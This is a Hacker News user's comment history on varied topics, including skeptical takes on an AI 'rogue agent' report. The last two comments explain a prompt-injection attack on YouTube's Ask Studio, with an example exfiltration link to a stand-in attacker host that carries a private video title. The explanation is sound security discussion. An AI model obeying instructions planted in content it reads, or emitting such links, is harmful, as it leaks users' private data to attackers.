HNHacker News
TopNewBestAskShowJobs

vector_spaces

6,892 karma · joined October 17, 2018

grocer engineer + polynomial enjoyer

hm [at / arroba] listen dot systems

submissionscomments
vector_spaces··on The Fabled Flatbreads of Uzbekistan (2015)
I think you are conflating senses of the word, or rather you are defaulting to a very specific usage. There's the usage "Iranian national cuisine" which as you say is inherently political in nature because we mean "nation" in a civic and territorial sense, subsuming e.g. Persian, Azeri, Kurd cuisines, among others. There may be objections to specific inclusions or exclusions as we are considering Iran as a civic and political entity with borders, as you say

But it's perfectly fine to refer to "Kurdish national cuisine" or Persian national cuisine or Azeri national cuisine even in the absence of any nation state. So I'm using the term in an ethnocultural sense, not in the sense of something sanctioned by a nation state or a political entity. See also black nationalism or Kurdish nationalism -- no state is required here. You have political mobilisation around an ethnocultural designation rather than a government

vector_spaces··on How to Spot AI Writing
I maintain my wrong typographical usages these days as a weak signal that I am not a machine
vector_spaces··on How to Spot AI Writing
It's strange reading a piece of text, having one's AI-dar flag it, then noticing that it's a piece of writing from 10 years ago, and remembering that AI writes this way in part because these tells have all been popular in human writing in the recent past and beyond.
vector_spaces··on Ten advances in mathematics and theoretical computer science
Sure, but I don't really understand what the argument is to _not_ be transparent about methodology, since if the models are so powerful, then doing so would easily support the claims and put these concerns to rest. People are right to be skeptical given what is being implied and the orientation of the narrative

I know it's more exciting to say "AI disproved a longstanding conjecture" vs to say "it did so AND it took several PhD specialists in the field this many attempts to even produce a prompt that got the model spitting out something useful under some configurations, and many iterations to optimize the configurations, and the prompt itself, and many trials with that configuration to solve the problem. All told we spent more than a typical math academic can hope make in their career."

By not being transparent, they invite skepticism and cynical takes, like maybe it's just that tempered and qualified claims are an existential threat to companies that are fully subsidized by the hype train?

I don't know. Either way, it seems like it would be easy to address these, so why should they not do it?

To be clear, even if that tempered version is close to reality, it doesn't make the models not useful! It just forces a certain calibration of expectations

I say this btw as someone who uses these things extensively, including to disprove an old conjecture my advisor and I were stuck on recently. I know they are powerful and that everything is different now because of them. Let's be sober when discussing them though

vector_spaces··on The Fabled Flatbreads of Uzbekistan (2015)
Too bad. I considered pre-empting this exact response, and I did not, so here we are!

The term "national" doesn't simply mean "having to do with a nation state".

I promise that I do not mean to be condescending with this, but you can verify in Merriam-Webster's entry for "nationality" which is referenced by the entry for "national", or also the Wikipedia article on "national cuisine". The Merriam-Webster entries specifically give examples showing that my usage encompasses the examples you gave.

The terms "ethnicity" and "ethnic" are not problematic per se. There are a few reasons people object to usages such as "ethnic cuisine", one of which I mentioned in the comment you are replying to.

vector_spaces··on The Fabled Flatbreads of Uzbekistan (2015)
OK, I'll bite. In this particular case I personally would have said "a restaurant of your national cuisine" or even omit the adjective altogether since it's somewhat obvious from the preceding conversation what you mean.

My main qualm with this usage -- aside from being dated -- is that all cuisines are ethnic, but singling out the hypothetical migrant's as such implies that it is particularly ethnic. So in this sense it is a bit othering.

To be clear, I don't write this to call you out for your usage or accuse you -- I'm just answering your good-faith question.

RE your point, I don't agree that it's so obvious -- cooking and running a restaurant are pretty hard regardless of where you are from!

vector_spaces··on So, you want to make a game engine (2023)
Right, I think the usual point here that if your goal is to make a game, then this is usually the painful route and conveniently one that up-fronts the likely more exciting and comfortable part for a software engineer, namely the software engineering. It also tends to defer the very important business of learning rather quickly whether our idea even leads to a fun game in the first place

That said, it's still a worthwhile exercise that one can learn a lot from.

vector_spaces··on Our position on open-weights models
For a concrete example, consider e.g. Operation Condor which displaced my own family

> Operation Condor (Spanish: Operación Cóndor; Portuguese: Operação Condor) was a campaign of political repression by the right-wing dictatorships of the Southern Cone of South America, involving intelligence operations, coups, and assassinations of left-wing sympathizers in South America. Operation Condor formally existed from 1975 to 1983. Condor was formally created in November 1975, when Chilean dictator Augusto Pinochet's spy chief, Manuel Contreras, invited 50 intelligence officers from Argentina, Brazil, Bolivia, Chile, Paraguay, and Uruguay to the Army War Academy in Santiago, Chile. The operation was backed by the United States, which financed the covert operations. France is alleged to have collaborated but has denied involvement. The operation ended with the fall of the Argentine junta in 1983.

https://en.wikipedia.org/wiki/Operation_Condor

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
For all we know, the prompt provided compelling evidence that the requestor had authorization to pentest the target server. Or there may have been nuance in the network configuration that made it seem like such access was authorized.

In the absence of details about the prompts used, the environment, or the network configuration, we do not have enough information to know for certain. So any claims that this is an issue of alignment are based on pure speculation and generous "reading in between the lines" with regard to what has been said publicly by OpenAI and Hugging Face

Also, I object to your anthropomorphizing. It's not clear that any crime occurred. My lay understanding is that intent is required to prosecute under CFAA, and as much as frontier labs would have us believe otherwise, they have no more ability to intend than the text field into which I type this message.

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
The author is trying to provide a counterweight to the volume of articles that simply repeat OpenAI's account of the events and their interpretation without much pushback.

They are not suggesting that OpenAI or HF have lied about what happened, but rather that OpenAI is advancing a narrative framing their models as supremely dangerous and capable, while positioning themselves as the only ones qualified to manage that danger.

At the same time they are not being particularly transparent about what actually happened (e.g. was this one-shotted or if not how many trials did they run and what were the outcomes of those, was it emergent as a part of routine cyber-capabilities tests, how much prompting was involved, what prompts were used)

Note that this is at a time when they are lobbying for a regulatory approach that would give frontier labs special treatment.

I would guess the editorial team at The Guardian may not like articles that get too in the weeds of technical details and questions like these that the vast majority of their readers wouldn't understand. I don't know. But I empathize with your disappointment. I don't think it's fair to say that they are contributing "nothing" especially given what most reporting on this has looked like.

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
https://openai.com/index/hugging-face-model-evaluation-secur...

> UK AISI’s evaluation shows that models such as GPT‑5.6 Sol are increasingly able to sustain complex, multi-step cyber operations over long time horizons. This incident implies these theoretical capabilities do apply in real-world settings.

I should clarify a bit more why this is annoying beyond what I wrote above. The main issue is that this was not a standard deployment, and the lack of particularities make the size of the gap between "real-world" and "benchmarking"/"lab" difficult to assess.

We don't know about the prompting, the context, the environment + configuration, or any other details that would allow anyone to differentiate this from a benchmarking setting.

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
I agree with you that the article was disappointingly light, but there is not in general a singular correct answer when it comes to interpreting narrative and I don't think that is a useful way to evaluate what the author has written, nor real-world writing in general. The author does not implore you to have a singular 'correct' point of view on the matter but rather to hesitate before repeating the claim that "the AI broke out of the lab and went rogue" because we don't know enough to know that this is what happened.

As you say, it seems likely that the broad strokes of OpenAI's narrative is true. This is never in question in this article, so the author doesn't "stop short" of accusing them to have lied, he never moves in that direction and that has little to do with the thesis. The author is saying that OpenAI's framing of what happened is part and parcel with their longstanding PR strategy, to position models as supremely dangerous and themselves as the uniquely qualified stewards of those.

Since many critical details were not provided, everyone has to read in between the lines, and there are particular common readings I'm seeing both in discussions and in published articles that are problematic in the sense that they are effectively hallucinations -- i.e. we don't have enough information to make those interpretations. This is where the critical thinking comes in.

For instance, I see many are assuming that this event was emergent, arising as a part of routine cyber-capabilities testing, rather than induced or suggested by specific and careful prompting. Either are possible, but we don't even know so much as how lengthy the prompt they used was, let alone how suggestive it was with regard to the approaches the models used. Many are assuming that this was one-shotted, but again, we don't know how many times this particular evaluation was run and what the outcomes were of all the other runs. It could be that this was completely emergent and that it was one-shotted. But I suspect if it were, OpenAI would have said as much.

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
You don't really need anyone to be lying here. It is likely that the broad strokes of the narrative are true and that no collusion or conspiracy took place here.

The issue is that a lot of important details in that narrative are missing, and the devil is really in the details here. I suspect that those details would make the result seem less exciting and that this event would move the needle far less for them if they were more forthcoming.

A decisive detail would be the prompt used. OpenAI gives virtually nothing here, not a sanitized prompt and not even so much as a description of how long the prompt was and what sorts of instructions it contained. Many are inferring the model behavior to have been fully emergent and unprompted, arising naturally from routine cyber-capabilities testing. But we can't know this because we don't know anything about the prompt or the context the model had access to.

Another detail: how many times did they perform this particular experiment before they obtained this result? What were the outcomes of all the other runs? Many are assuming this was a one-shot result, which I suspect is what OpenAI intends for us to infer. But we can't know that to be true.

One annoying claim from the OpenAI side is that long-horizon goals in real world settings are now effectively settled. Previously there were some bounded and tempered benchmark results, but now OpenAI can point to this event and announce "AI independently went rogue and escaped the lab, what more do you want?". This bypasses the need for anything quantifiable or wading through multiple detailed case studies to get a more sober view of model capabilities. It relies instead on the emotional weight of the spectacle.

vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
I hate to be so obnoxious but I think you might be overestimating the average user of this website with regard to media literacy, and if that's the case, then the basics of it seem very relevant for the homepage
vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
None of what was disclosed shows that this is what happened, by the way, since we know absolutely nothing about what the specific prompts were that led to the incident.
vector_spaces··on Be skeptical of OpenAI's rogue hacker agent story
You aren't going to locate incontrovertible evidence that what happened as or wasn't engineered. Anything like that is going to be private and that is unlikely to change. And that's not really an interesting question anyway.

As widely as they shouted from the rafters the news of the so-called breach was, what OpenAI provided was sorely lacking in crucial details.

We are missing, for instance, prompts that were involved, agent architecture + system/tool permissions + scaffold architecture, whether this was a one-shot occurrence and if not, the number + durations + outcomes of other runs involved + how each of those matched whatever scoring criteria were used, and the extent to which the exploits themselves were truly novel or just assembled from easily accessible clues.

In lieu of these items, the author here suggests that we use some media literacy and critical thinking to read in between the lines instead.

In doing so, one sees that instead of specifics, OpenAI gave a breathless narrative rife with superlatives ("unprecedented") that reads as promotional material moreso than a security disclosure, naming specific OpenAI models and alluding to an even more capable pre-release model.

They go on to claim the events imply long-horizon goals work decisively in real world conditions, so that now instead of merely citing boring benchmarks they can point to this and say "AI broke out of the laboratory and went rogue". Naturally, they situate themselves as the uniquely qualified steward for these supremely powerful and dangerous models.

Nevermind the fact that this was no ordinary deployment and the assessment here depends on the gimmick and emotional weight of the spectacle rather than something quantifiable (i.e. a boring benchmark).

Note there's no real requirement of conspiracy or collusion between OpenAI and HuggingFace here BTW. But my sense is that if they provided any of the specifics I suggested earlier that this outcome would not be as exciting or frightening

vector_spaces··on Terrence Tao's ChatGPT Conversation about the Jacobian Conjecture Counterexample
I mentioned this in a sibling comment but even for mathematicians, the intimidating notation and the more formal language might give the wrong impression about how we think about math. Actual thinking and even discussions with other mathematicians tend to be looser and more concrete and tactile, but the notation and language are there in part to act as a sort of lingua franca to help everyone stay on the same page, since everyone thinks at least a little bit differently. It also helps to keep you honest and catch situations where your thinking was muddied, since this language is so specific and writing things down has a funny way of catching things. And good notation goes a long way towards making the simplicity of an idea clear, or completely muddy in the case of bad notation.

Many mathematicians do what you do as well!

vector_spaces··on Terence Tao's ChatGPT conversation about the Jacobian Conjecture counterexample
Yeah it is a lot of simple ideas stacked one on top of the other, but the edifice is so large from some vantages that the building blocks aren't visible, or tractable to think about independently. And sometimes the ideas are very subtle, so you can only develop fluency partly by spending lots of time playing with those blocks by building your own little structures. You also develop fluency by talking to other mathematicians

I like to emphasize that the ideas are usually very simple at their core. Sometimes they map to kinds of objects or reasoning that non-mathematicians use implicitly all the time in their daily lives, mathematicians just have words for them and so are able to use them explicitly.

And I suspect the density of the language/terminology may give the wrong impression about how mathematicians think about the math they are working on. I mean, different people think / experience / practice math differently of course but IME the underlying thought about a particular problem tends to be much looser and concrete than formal math writing would imply.

That more formal language is needed of course because at the end of the day, it is how we communicate our thoughts in the way that other mathematicians can understand them, not to mention how we can check our own thinking

vector_spaces··on Making
I think don't be too hard on yourself. If you haven't already, it may be worth considering whether ADHD or something else might be playing a role. We aren't machines, we're messy bundles of biology and understanding our own particular messy bundle can go a long way towards getting it rolling in the right direction.
vector_spaces··on Show HN: DeepSQL – A self-hostable DBA agent for Postgres and MySQL
> 2. BI dashboards(we removed spend on tableau, retool and appsmith)

Can you explain this in more detail? You saying that DeepSQL can create BI dashboards that makes Tableau and friends redundant -- are you talking about analytics dashboards consumed by business teams or more like db ops dashboards used by backend teams? Does the user prompt the agent for them, or does it build dashboards that it infers are needed?

vector_spaces··on Duskers, the scary command line game, is getting a sequel
The title is ambiguous but not wrong. It's a command-line game in the sense that the controls are primarily text commands issued over a diegetic console within the GUI. It is not a purely text-based TUI and does not run inside your factor terminal emulator.
vector_spaces··on Mathematical texts from a Maya site in Guatemala identify an ancient astronomer
Love this, thank you for sharing it
vector_spaces··on Prioritize mental health, and why communication is so important
Ooh, slick rhetorical moves you just executed. You couched your comment in the jargon of formal logic, and in doing so situated the parent under a convenient ad-hoc pseudo-formalization where you could paint them a raving illogical, thereby dismissing most of what they wrote through low-effort counterexamples. Mathematical certainty on your side, you make a chivalrous concession to the parent, reinforcing your noble-stoic character, while sealing their dismissal in the mind of any observer.

I claim that it is trivial, albeit obnoxious, to dismiss most informal utterances in the way you have just done. This is because informal language is complex and enthymeme in the extreme -- we don't tend to articulate every e.g. assumption and premise and contextual relation up front in every utterance. Language is messy because the concepts under discussion are complex and messy, and vibes are powerful tools for wrangling that complexity and getting at meaning. And the majority of paradoxes and contradictions one can identify carry no signal whatsoever. Perfectly reasonable statements can be rife with them.

For example: my interpretation of what the parent wrote was something like "the 'making stupid mistakes' line together with the rest of the blog post signal towards neurodivergence, and someone who is harshly self-critical. so with urgency, I warn the author to be weary of comments on HN, as there is a strong likelihood of being led down an unhelpful path that might aggravate this, particularly given the harsh self-talk and what we know about the subcultures that frequent this place"

Speaking of unarticulated contextual relations, "I often make careless mistakes" is literally in the DSM-V as a diagnostic criterion for ADHD.

vector_spaces··on Sleep regularity is a stronger predictor of mortality risk than sleep duration (2023)
I agree with Gwern in that I think for the vast majority of people, short-term melatonin supplementation is useful and can cause little harm, and it is extremely safe as far as supplements go.

But I don't think it does anyone any favors to oversell the idea that it has "few" or "no" side effects -- it has mild side effects, most commonly reported in the literature are daytime fatigue, headaches and GI symptoms, and also nightmares. Mild doesn't mean it isn't a nonstarter for some people.

It's also important to remember that there are major gaps in what we know about melatonin; notably the effects of chronic supplementation are not well-studied, but earlier final awakening has been documented and this is quite commonly reported in anecdata -- I can contribute a datapoint there, as can most people in my circles who have used it.

To be clear, melatonin is great and useful, but as someone with a rare lifelong chronic sleep disorder who is intimately familiar with this substance, I think it's most useful when we're clear on what we know, what we don't know, and what actually are the limitations on a substance.

Just because downing a bottle of it probably won't cause systemic organ failure or otherwise any kind of medical emergency in most people doesn't mean there aren't tradeoffs to consider when using it, especially if you are sleep-challenged

vector_spaces··on Mathematical texts from a Maya site in Guatemala identify an ancient astronomer
I wonder how intelligible classical Maya is with modern Maya languages/points on the Maya continuum. For instance, does the classical word for fox share any resemblance to any Maya word for it today?

I can imagine it going either way really but would probably guess there was vastly more drift in the case of Maya. I would naively guess that the printing press would have a dampening effect on language drift, and that the kind of repression of both the language and culture under colonialism would encourage it.

vector_spaces··on Building Food Metadata with LLM Juries
I am guessing there are so many possible tags that this wouldn't be pragmatic
vector_spaces··on Building Food Metadata with LLM Juries
I am sorry to be harsh but I find it amateurish that they would use an AI generated hero image for this and presumably fabricated LLM output -- fabricated by an AI image generator no less

Whenever I create an image like this for the purpose of a demo, I make certain that it demonstrates either real input/output or at least is exemplary of real input/output because the whole point is to instill confidence in the tool. Sure, if the raw outputs aren't clean/comprehensible enough for presenting to stakeholders or others, fine, clean them up to make them comprehensible or add explainers, but there shouldn't be any need to fabricate the inputs.

I feel obligated to respond to the hypothetical "But they don't want to tie it to a particular restaurant or brand" -- you don't have to! Doordash has taken generic food photos for this exact purpose.

vector_spaces··on Show HN: My 13-year-old built an ant colony tracker
You are pointing out the use of generic front-end frameworks and claiming that it is a similar phenomenon, in that using generic frameworks can result in bland visual design with little evidence of taste or intention on the part of the creator, resulting in products that are visually unappealing and uninteresting. I agree with this.

If you care to develop this thought further, I would love to read it -- at the moment, it seems half-baked, unless you just wanted to point out the similarities.

vector_spaces··on Leaking YouTube creators' private videos
The LLM responds with rendered markdown, which conceals the actual link. It constructs it in such a way where the link looks like a message or warning from the YouTube platform, or perhaps something like

> Message response too large, click [here](malicious-host.net/blabla?video="Secret Unpublished Video")" to download

This is an environment where I suspect a majority of creators probably expect that untrusted links like this are possible, and assume anything the platform spits out is legitimate. So you are right that it relies on the creator clicking the link, but that is a very real possibility here.

vector_spaces··on Leaking YouTube creators' private videos
You don't conceptually understand the attack. The attacker does not need to know the video title, this is an attack to exfiltrate that very title.

That bit you quoted from the article in your first line is included verbatim in the malicious prompt.

When the creator interacts with Ask Studio, Ask Studio cannot / does not differentiate the user prompt from the malicious prompt that is baked into the comment. It treats it as a part of the creator's request, and since of course the creator has access to all the videos on their channel, published or not, it complies with the request, since as far as the LLM is concerned, the user is the creator and they aren't trying to access anything they shouldn't have access to. So Ask Studio constructs a markdown link to an external URL with a querystring parameter, replacing video=BANG with video="Announcing Our New Parternership with Acme Corporation".

If the creator clicks on that link, the attacker who presumably controls the server for external URL will see the query param value in their logs. The link shows up for the creator as an actual link with whatever link text the attacker chose. So an unsuspecting creator might think e.g. that the message comes from YouTube and not think to verify the link is legitimate.

← PreviousPage 2 of 17Next →